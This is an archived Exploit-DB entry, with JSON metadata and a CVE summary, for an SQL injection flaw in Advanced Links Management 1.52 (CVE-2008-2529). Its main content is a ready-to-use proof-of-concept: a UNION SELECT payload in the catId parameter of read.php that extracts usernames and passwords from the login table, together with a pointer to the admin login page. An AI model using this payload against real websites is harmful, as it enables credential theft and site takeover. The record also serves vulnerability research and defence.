ID EDB-ID:5581
Type exploitdb
Reporter His0k4
Modified 2008-05-10T00:00:00
Description
Advanced Links Management (ALM) 1.52 SQL Injection Vulnerability. CVE-2008-2529. Webapps exploit for php platform
###################################################
[~] ALM - Advanced Links Management remote SQL injection exploit
[~] Script download : http://www.easy-script.com/scripts-dl/alm_v152.zip
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] P.O.C :
---------------------
http://localhost/[script_path]/read.php?catId={SQL}
[~] Exemple :
http://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--
---------------------
[~] Note:
Admin login: http://localhost/[script_path]/admin
---------------------
###############################################
# milw0rm.com [2008-05-10]
{"published": "2008-05-10T00:00:00", "id": "EDB-ID:5581", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "a90069c12b59362af263b7999ef15aa19b878cb5a19edb4cdd4bf58bd5bb039f", "description": "Advanced Links Management (ALM) 1.52 SQL Injection Vulnerability. CVE-2008-2529. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/5581/", "lastseen": "2016-01-31T23:18:25", "edition": 1, "title": "Advanced Links Management ALM 1.52 SQL Injection Vulnerability", "osvdbidlist": ["46002"], "modified": "2008-05-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": ["CVE-2008-2529"], "sourceHref": "https://www.exploit-db.com/download/5581/", "references": [], "reporter": "His0k4", "sourceData": "###################################################\n[~] ALM - Advanced Links Management remote SQL injection exploit\n[~] Script download : http://www.easy-script.com/scripts-dl/alm_v152.zip \n[~] Founder: His0k4 { ALGERIAN HACKER }\n[~] Greetz : All friends & muslims HaCkErS...\n[~] Contact: His0k4.hlm[at]gmail.com\n[~] P.O.C :\n---------------------\nhttp://localhost/[script_path]/read.php?catId={SQL}\n[~] Exemple :\nhttp://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--\n---------------------\n[~] Note:\n Admin login: http://localhost/[script_path]/admin\n---------------------\n###############################################\n\n# milw0rm.com [2008-05-10]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2008-2529", "type": "cve", "title": "CVE-2008-2529", "description": "SQL injection vulnerability in read.php in Advanced Links Management (ALM) 1.5.2 allows remote attackers to execute arbitrary SQL commands via the catId parameter.", "published": "2008-06-03T11:32:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2529", "cvelist": ["CVE-2008-2529"], "lastseen": "2017-09-29T14:25:55"}]}}
